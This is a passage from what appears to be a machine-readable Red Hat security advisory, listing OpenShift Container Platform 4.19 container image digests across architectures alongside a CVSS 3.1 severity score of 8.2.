"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-node-exporter-rhel9@sha256:7f8f9a3bce37f846d92e13388b17cff7e606c59abf74b88e8932cc4eb17f5828_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:395c76d76ca411005e4edc332331e1e36152ac788e1a54a02975ad3478a7f5de_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:53d9fba19f9ae47a65713eb4127c1f0c672a04cb55ec52861af3124dd2fe1e30_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:ceceb8b787ae6f1e9f00e32e4914456ae8dfe3f47c50efbf55ed0d1bb3f6c78a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-operator-admission-webhook-rhel9@sha256:f99105f06107aae1f680d94d03d2f90607286c026aca50a877063235773368c7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6f39433829144540b1030be91fecb0b225ec0212fe0e63f4ff50c7d1e9461a38_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:6fc27364a010efdbaeb7ede2c4aeaf867a8743d4fa9af5f9b6a16149f945de69_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:8ce1023bff832cada7cd5754986f8f2a7e24df72eee17707ff6df3acdab58465_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9-operator@sha256:e838bcfd2b1e7bb1376baff2a9e83cfb712b35be02767f62f10acc4edf5b4890_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4371bbcc4e87a108d9c6f2121c9120a5abcf32240f2c5b8fa4d9ff9023821d81_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:4f7944def4efb736d1bb91507ce49497840db06495408913b57591fd2f72ed22_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:bb6e5818c800f72e4318c715666b51239050a3e7a7b6e7fdf96ec3b343a419af_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-prometheus-rhel9@sha256:cfd82e42cdba7e0724a9b0c5b90d42d526913ac96104e3ab6b449b59c3f5f3ad_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:355c8c7080214dbcd15bf77122550909eda1b1a5a1bcbc695ce80a495518b066_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:38a241d766a8321cfda212df868c63751fab60d99d8f05c671c07b39fc2dd2bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:4efb83eb7fca945c2f8bbb8c141c87bd4b7c4bd1ad09998e0e52259bcda88bd2_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-service-ca-rhel9-operator@sha256:81ae7211c791e2b2e8f9ae37ba0c935e1b8dc8edef9c412058519e813518e6e7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:37a306bd6ec2676ed92426fc7e69cc2a3169013c31997f1144a1f22750309582_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:42985904fd805f7e3afeb21e514100045bc0fc77b7f7a8b81ce63c892d7eba70_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:6b6894e000302c61bc4eb20795f86491c14cddc1110e2534442b399d0e22ebdf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-telemeter-rhel9@sha256:a97fadbd51c77b4a854ecf0c403936adbf136dc83af3213fcc35fd6d5d67679e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:132bb73fc0ee5add8ea39eda9e4acfc0e3fab4ab85d2fb959e9a359dfe2b7b79_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:30c2d5c0f6ccd61860e95309dc27f8a1412cc6cf6173fef9a48461186f296336_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:6440ce5a0f8c34fea0b65fd43d8415c03d2c8c074f47efab4a2e47182a126c38_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tests-rhel9@sha256:8c4b496454f9e8fe0bc85b5d4feb01c4c8ea0935d946b900ada2531d2c294ed3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:458198718ad90fe2caed08f8ae82b2ce996d62cc6455672db992e7f9bbacbcd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:5e6e5206c98ab903f70b3e7402ac1d0c4342577038cb5810a268ba235502a717_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:60ec51c360f250cf70fdd2442b9def1ec17e2ded2cefe158995d701a0a7ec525_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-thanos-rhel9@sha256:a116039d2376221a308ad495493553e704358e9cfc2fa4104785f7dd7242b90a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:05e68f45e8578ef2401473deda111a57de11143bb3cd63f84742cfc1bdbde1de_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:99d76e0fcc4bd0f276d574ea2edad252b552301aa10e2e4241e0e9462fdd03e7_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:d3fbf646c682c41b45e5ac529e3fa35abdb2610c2e746bfe19a7a12867165968_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-tools-rhel9@sha256:ff983c80717ff42cf4c6484fa4c38a1df4c88fd40d4e05fa3c47434d949d256b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vmware-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cloud-controller-manager-rhel9@sha256:fdf18e2f91a8d7dfed9ab25f41666e1f3ff3c2a49866a1ff557629602b9f4726_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-cluster-api-controllers-rhel9@sha256:75c7ccaeda39a8ede8e78244478c7fb3dd03c1523ef3dcda8982cc8cc74a7aee_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9-operator@sha256:bcba79c5b4e0adf2cb63a96b2d7a089bc5a7ef0960ea5a54d50a36761ea7033e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-rhel9@sha256:79ffc4eed49cdd6aa9854d731ea9f85ed37af6e274c04359f048afea038ed48f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-csi-driver-syncer-rhel9@sha256:0d1f878c9d72ed2e0cf721f35015c55385df1eb3eb9bf966bb7d626f7826baf3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-vsphere-problem-detector-rhel9@sha256:0925ab89d006b1b2665e701f3943ad2684e31ce86408919378014ecb7f7403ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:0f1cb5f6dd220cb36e689dfa996022085bafe7a06aa6b8f3e4737ca281e143c4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:27a24944f1ef11eb36634a670dc865b5ff0a15d2e11905b82498916d8e9bf580_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:dcffbfba5a93e392e08fb0d010fd9b75694c4411016d09852fc51239d5234e9d_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9-operator@sha256:fe3bfd4f788d5fe7258d04338de8ba9df4638db341674caed43859927f6ee3f9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:15d38afb007a612060445e5725ead06ed81130b761b11661e608a0debe464d24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:4e69689cecf4ba62c9a3b7305e80c15ad5fcccbc85fb59a7e2969e14c7fb85f3_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:a7a04880260ecec43abbfe7546f34ab6db488e82574cd7e9b0befa5399b601e8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ovirt-csi-driver-rhel9@sha256:dbca06ba2c04ea72c1eb33a6c9d1c075016531eb9f72fc589fe759e55a57c408_s390x"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 8.2,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a31c0d7654d2495710df721e8e1aa57ae47f028966ca83aaa1b74a5b57f0a276_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a657295bab1d29d15cdd77ce366dd388153b5783c054067ef0ecd1c84e76db4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:a95b88717fb16e809ea0b8654929e2808eb6fed3b84e45bbe3886e020d7acac4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-karpenter-provider-aws-rhel9@sha256:e5b07464aedee0bfb213c132174a22fc66e279eb8f7688078a07657237a8d334_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:4273b3050117faf7bb14fd2bbcf71c5606b7b6f1326fcc1a36cf3ed51f6b3de0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:5a2ecf041953f1ac77ef2ff25b6ccbb1c7b7741bcca8eab2bdeae706019f6c83_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:9874d99c0cb18c7120982f093f99fde589255ef5cfb1c67b6a6e95cf66f87a91_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/aws-kms-encryption-provider-rhel9@sha256:e5c889f9c92df65efd279220829dc129023a34fd6c4b4d93264739852581cd93_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:35cd98a46072b8c966553d8bb60bc4ed2f3c055eeaf3e7c4d080ec9605f6a96f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6a108c888888fc9a2fb0a3b834aab6eb2a6c0b691a39e3461725f87580062a91_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:6d2feee745979668785a904900f8c9d5327477f83361f26eb5879e87e081bd25_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-kms-encryption-provider-rhel9@sha256:c17c46279d5ad92b5ad7a58a1dc1bb8331b15ab424e7274818a1c47898b528e2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:055fea2fc51b9eb48327b78542f420a1d65dbcf786324f7bcbeda053d3fd35bc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:1d66a8807c27cd43c86399e67ec86906edb97be4ca38b4a752bef1c880848083_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:980e2f5e0f0676e559e91d50e2927fb9bf2f598db0d1ba043440e04d76cf46b9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/azure-service-rhel9-operator@sha256:dcd241b04a6e196ad8b66a9d3cce0df26f126e99a85ce7a5443e61dc76194e5b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:093a5ff464b31d0f1058c452843dd119dfd1798d91855dbe9fdbd5a45c912efb_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:2320a5d225dccf8f02379818bee2e93ae87a8444698f20141f6a0425b1661601_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:46adf0538ec9fbd67abc4565c013f2503c2a11191de264310a2c770bfb566753_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/cloud-network-config-controller-rhel9@sha256:d48ca3a08fbb356d69be5b61274d75b701d48803a9d57c8d377ce2d0df83169a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:0b1b706bc5a0188d40950a1fdd30f8c410e68dd568ed7d07c1f09443fbde28f4_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:173800cfc487973c018e8d9badb7d60d26509bbe0803e9a56fba1d5a65070dc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:78a2368225915aca2a514c5d82ba82fff8e70e6123c08905c46839a821f4c8ab_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/container-networking-plugins-microshift-rhel9@sha256:e44aa77638b86f0ade3d4b69e150e8e9e95573ec90b6031224b87e404b5d6a79_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:313b7b7e1f619f5fd121ca2402d9db6876d021be227b496288809f63f1209561_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:5b232dcf5a47400d1b1d105895df8143b50dc74613b1463b275d6d304e0e0085_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:774dcaecbaa4f7b743b49c34a6a9889a27c6379110672a2f28fb4f83cb0f0fe6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/driver-toolkit-rhel9@sha256:8d55cc650683e44676413797328fff9b3563eb78a1aae4cabe736b20e9f15ff4_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:13cd27f7e445af565cef18a24ceca435b4ce2a0c99876b9ad087fdf50e343be6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:5eee15ae4f809e708dbba035fdf60bd2c331462bc6256df74f9124fac03be62b_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:af94257f6dd0307527211d5ab2b77ff971d5432a003d4f8e2f1e884cf6ee5215_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/egress-router-cni-rhel9@sha256:cba1849a3d647457c561e01daf7eda74d775430a8b95458684620c0ebb3f47d2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:1b9bd17c112e00f11fca3cfaea5908d0cd370598beb6909a3c00f58ca6774bee_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:2c646a3a35e8a4503f378096f6045fdb816fa9d5728cc14759748b7265aa47dc_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:47fd82ed75709dd28b0f9f2eab2a051e3bedac64d2fa11dc93a8a8a7159e287b_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/frr-rhel9@sha256:e95f8dd80a31504ccf2ff1ea37026370e41edd179151f1c7c2901e5ed12c1296_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:65c161d7215a460b2295a2b4eb82e8bd7e2079e145596185f83d84c4676f1eed_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:8f7e2a8735cb9b09639c5a467b8656bd7dd1bd4f72bc50164f0e4623ffacd93c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:a045bd36d61b9586134423526ec66f4aa18c140958a01da59ffaa4003c229e4e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-exporter-rhel9@sha256:d426bb25b78392f8093739e457ab75adf9366406e09ef18f8c75d8998a24731e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:17333d63845becea642ecb6fd8f76e7a4d698f8a661a981b59e9c920d1973d46_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:5c73127d0656e37837d8dba2e4770da5bc26885daf37a4d708a04399410d85a2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:ee3b7a97fb8e0f135e89f28c4f3ad31463a17003c92b979b4f16c262d8d69737_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/insights-runtime-extractor-rhel9@sha256:f59805de5ca2dde13a899b2058e1178288c80e4589515b08b89a6341f64fceb2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:4892cd8581f10f3338980a4bc69f02d8379e54fc0f4c4d11af27baec253ea11a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:92295081a775d918e0963d2aff01bb21fc1200ca06faf7a882c652ebeee8c8f0_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:a832bdd818c5c9aa386c7b8fc068c7e41454bd3ae5851e4a805e17c0a22485d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kube-metrics-server-rhel9@sha256:f3f2d167037e26af9b863e6561d2d64bcccdabfc3a6efa7f1085389ece519661_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:01d975619247a08e37e5d9fb38dcbca09555b283991441a4a208da524e4f8c74_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:04db41f215a8d65a168c117ad8cdbf0d0ca3dc4baaa5acede9e29beac647ce0e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:67d767e895fb0299033848441253b41588136a70e31763386c973672c26be496_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/kubevirt-csi-driver-rhel9@sha256:be919e58f27fa8f244683d2b42e4aa2ab467dc93fe7c3c3c3b6032f3555627f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:083bb81614554fab84226913ccd021b11f7ef126606dbd10cabd727a501551e4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:1aa42ec77b3d3339df819904aa14a43382739617e532b5d0002a5e4ebc74736b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:83ef5cae2611a335710b324338a1f26d7e90a7918b4fe642e05e447e65d46b7d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/network-tools-rhel9@sha256:fa1d216867be999b74ea9e61644fe42315952afce3b6efce25308960adf393eb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:15832adc4ad8716113e5cb0aa6af6ab43aa6c4608e8909fe31041e46fce6ab42_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:596dad4fcad33b13f2db099ba3ac4aefa3e7ccde280a75b658df139227b63732_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:849b3cc7fe43ab6480fcd974e7796f5b8aa1e610add35558635b3c8afc602975_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/oc-mirror-plugin-rhel9@sha256:a35e6d40471cdcec9fa54afc1da4c2ddb4ff2739b65bc67ddbff655aaf45a09f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:6c6b2ab932649b97579c8a76f57d9c8f0c8b2dededcd0843563d7bb85d116b8b_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ab8f35a5cc7907c3114427a3f46489cf2cc54650caa9d15b1654fff6f0e43dc3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:ceedbad08f41cb0095006089b0595524a1ffa3c035f39e59d5ebbd5be07fcdce_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openshift-route-controller-manager-rhel9@sha256:fc090f33468f64fdd024263813034bd889ec44c61587ee9c1ecb8abdb9921da0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:23369a9840fe178321aa47458d1fea488bf37545f4a335d39ba4cc0711019c3e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:784f4206de4bb479ae43476c483face9ba3b209188b3a0201f66580b944fca02_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:87546cc6262c2c6eadb54266c42ccc03c3e2ad7c3c809ee21529f0bfb4707105_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/openstack-resource-controller-rhel9@sha256:ed079597ea5b2fe6bf4d4b7efa09f6cb76691362c62a268accb0d5bb5fd7daed_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:2845efdf030408d0d545862b74020ec95c2e2f4c0fbcd6d5834002fd1f224b9a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:ae56b7456515539ec14105e5a8221b83dc53c1a5571a6e46e0c3b0632f98096c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b3351e1878d5ef1111ce4b2eca74bad875b8773b11b8597f83c11a7f7b226da7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-api-server-rhel9@sha256:b72fc45f6e78468f442c5bf487721227053eb0d49ef3eea5be6cef181007e290_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:12309e06f58c6b122ebc7ef2958ec0a0526edd9ea21b888866dcc2f753a7cf2d_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:5727ab378cdf09a1eb20b6120da5ee6d66a1473ea0d7dfd0709faf5c53df615f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:d85ca66233c95a4b622d97b50ae304dab7cd3ea67efbc40ab9ddb723478104b7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-csr-approver-rhel9@sha256:f26b039b69b5d006e04148dd4e7d6bcada2ae22c8892e094e43c6bb307a99cea_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:1f2b394a49751e0cbc81a776a8abefaee56aea8a2449a56f66ec4fb8bd7b36a0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:5a3bb13d5a7dfd660ce6ca1799af07ff0eb73148a51b3e5864fda09650186530_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:a676ed9f3d05a12ca0965f8b33d002d95cc8578f5a74f0bcf984594d784b0e3c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-node-agent-rhel9@sha256:dbd96ce5c1082dd3f2de07bd34f805d64952bee798cd96f2d9f94d195acbfd2e_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:0104fa2a05916db8ce121350b3e026a74891560be71999451943090f63d727a2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:590caaaf15b7a11ce69df24820ddc1f4b0b7a1c7cc5d2e62e2c3bfd35a5bb733_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69d052085b27f034e581680b283ed51134f2d8d5c895f0b2984946c158304249_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-orchestrator-rhel9@sha256:69f33223ac1b30068c884ba58ef4f04545ed5d02dab43dd525ff3f66c299885f_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:0beec3d7cd2663215fbfd97490b8aa1a684580e273dd9161d574f3ce5fe936b5_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:19636219d56bc03c8641e266ed3d82cae94bd7431e3da0c48ccba9bfb541ef6f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:2ad51487bd9dd02bdabe506d2c5758a9e9df2903a8a63d1a19d720281390eebc_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-agent-installer-utils-rhel9@sha256:7c081487e39de209265d2bb960fb68fa2997e1620f37bdd3bb1aac57483bbbe7_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:13560a7a1ab60ebe5a593c4c6819d730f1e8fad5031a5a38b7aa8ebcb52776b9_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:4f90910be0a33320bf234e3c25b6c364a0e730d76be53fc8c7e50227c14e25e2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:7406a10e78b85749cd597d3ced8b69a87a7931119611e996dd8cd660ff1ac47c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-apiserver-network-proxy-rhel9@sha256:d710074f9ebfa1ec4e15c5ee4718b748259f8907f4ec0aa56045c00cf19a691c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-aws-cloud-controller-manager-rhel9@sha256:6bf2ac59bb7ee40409082d564bde5d5568be09bd21219fe0c62ebc6624912b1a_arm64",
